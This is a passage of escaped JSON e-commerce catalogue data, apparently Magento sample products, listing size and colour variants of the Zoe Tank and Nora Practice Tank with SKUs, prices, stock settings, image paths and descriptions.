config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt02-orange_back.jpg\",\"image\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt02-orange_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"1649\":{\"sku\":\"WT02-L-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Zoe Tank-L-Yellow\",\"description\":\"<p>The Zoe Tank leads with eye-catching fitness-pop looks, keeping your studio style uptrend. The inner shelf bra and soft, breathable fabric create a tank top that looks, feels and fits great.<\\/p>\\n<p>&bull; Salmon heather tank top.<br \\/>&bull; 1\\\" elastic band on inner bra.<br \\/>&bull; Mesh lining on shelf bra for support.<br \\/>&bull; Soft, breathable fabric.<br \\/>&bull; Dry wick fabric to stay cool and dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zoe-tank-l-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt02-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt02-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt02-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt02-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt02-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Yellow\"},\"1650\":{\"sku\":\"WT02-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Zoe Tank-XL-Green\",\"description\":\"<p>The Zoe Tank leads with eye-catching fitness-pop looks, keeping your studio style uptrend. The inner shelf bra and soft, breathable fabric create a tank top that looks, feels and fits great.<\\/p>\\n<p>&bull; Salmon heather tank top.<br \\/>&bull; 1\\\" elastic band on inner bra.<br \\/>&bull; Mesh lining on shelf bra for support.<br \\/>&bull; Soft, breathable fabric.<br \\/>&bull; Dry wick fabric to stay cool and dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zoe-tank-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt02-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt02-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt02-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt02-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt02-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"1651\":{\"sku\":\"WT02-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Zoe Tank-XL-Orange\",\"description\":\"<p>The Zoe Tank leads with eye-catching fitness-pop looks, keeping your studio style uptrend. The inner shelf bra and soft, breathable fabric create a tank top that looks, feels and fits great.<\\/p>\\n<p>&bull; Salmon heather tank top.<br \\/>&bull; 1\\\" elastic band on inner bra.<br \\/>&bull; Mesh lining on shelf bra for support.<br \\/>&bull; Soft, breathable fabric.<br \\/>&bull; Dry wick fabric to stay cool and dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zoe-tank-xl-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt02-orange_back.jpg\",\"image\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt02-orange_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Orange\"},\"1652\":{\"sku\":\"WT02-XL-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Zoe Tank-XL-Yellow\",\"description\":\"<p>The Zoe Tank leads with eye-catching fitness-pop looks, keeping your studio style uptrend. The inner shelf bra and soft, breathable fabric create a tank top that looks, feels and fits great.<\\/p>\\n<p>&bull; Salmon heather tank top.<br \\/>&bull; 1\\\" elastic band on inner bra.<br \\/>&bull; Mesh lining on shelf bra for support.<br \\/>&bull; Soft, breathable fabric.<br \\/>&bull; Dry wick fabric to stay cool and dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"zoe-tank-xl-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt02-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt02-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt02-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt02-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt02-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Yellow\"},\"1653\":{\"sku\":\"WT02\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Zoe Tank\",\"description\":\"<p>The Zoe Tank leads with eye-catching fitness-pop looks, keeping your studio style uptrend. The inner shelf bra and soft, breathable fabric create a tank top that looks, feels and fits great.<\\/p>\\n<p>&bull; Salmon heather tank top.<br \\/>&bull; 1\\\" elastic band on inner bra.<br \\/>&bull; Mesh lining on shelf bra for support.<br \\/>&bull; Soft, breathable fabric.<br \\/>&bull; Dry wick fabric to stay cool and dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tank,material=Cocona&reg; performance fabric|Cotton,pattern=Solid,climate=Indoor|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WT02-XS-Green,size=XS,color=Green|sku=WT02-XS-Orange,size=XS,color=Orange|sku=WT02-XS-Yellow,size=XS,color=Yellow|sku=WT02-S-Green,size=S,color=Green|sku=WT02-S-Orange,size=S,color=Orange|sku=WT02-S-Yellow,size=S,color=Yellow|sku=WT02-M-Green,size=M,color=Green|sku=WT02-M-Orange,size=M,color=Orange|sku=WT02-M-Yellow,size=M,color=Yellow|sku=WT02-L-Green,size=L,color=Green|sku=WT02-L-Orange,size=L,color=Orange|sku=WT02-L-Yellow,size=L,color=Yellow|sku=WT02-XL-Green,size=XL,color=Green|sku=WT02-XL-Orange,size=XL,color=Orange|sku=WT02-XL-Yellow,size=XL,color=Yellow\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt02-orange_back.jpg\",\"image\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt02-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt02-orange_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tank\",\"material\":\"Cocona&reg; performance fabric|Cotton\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1654\":{\"sku\":\"WT03-XS-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Nora Practice Tank-XS-Orange\",\"description\":\"<p>A closet go-to, the Nora Practice Tank can be worn at or after workouts or beneath a baggy tee for a laid-back style. Perfect fit and very comfortable!<\\/p>\\n<p>&bull; Pink stripped tank with side rouching.<br \\/>&bull; Pre-shrunk.<br \\/>&bull; Garment dyed.<br \\/>&bull; 92% Organic Cotton\\/8% Lycra.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nora-practice-tank-xs-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt03-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt03-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt03-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt03-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt03-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Orange\"},\"1655\":{\"sku\":\"WT03-XS-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Nora Practice Tank-XS-Purple\",\"description\":\"<p>A closet go-to, the Nora Practice Tank can be worn at or after workouts or beneath a baggy tee for a laid-back style. Perfect fit and very comfortable!<\\/p>\\n<p>&bull; Pink stripped tank with side rouching.<br \\/>&bull; Pre-shrunk.<br \\/>&bull; Garment dyed.<br \\/>&bull; 92% Organic Cotton\\/8% Lycra.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nora-practice-tank-xs-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt03-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt03-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt03-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt03-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt03-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Purple\"},\"1656\":{\"sku\":\"WT03-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Nora Practice Tank-XS-Red\",\"description\":\"<p>A closet go-to, the Nora Practice Tank can be worn at or after workouts or beneath a baggy tee for a laid-back style. Perfect fit and very comfortable!<\\/p>\\n<p>&bull; Pink stripped tank with side rouching.<br \\/>&bull; Pre-shrunk.<br \\/>&bull; Garment dyed.<br \\/>&bull; 92% Organic Cotton\\/8% Lycra.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nora-practice-tank-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt03-red_alt1.jpg,\\/w\\/t\\/wt03-red_back.jpg\",\"image\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt03-red_alt1.jpg,\\/w\\/t\\/wt03-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"1657\":{\"sku\":\"WT03-S-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default 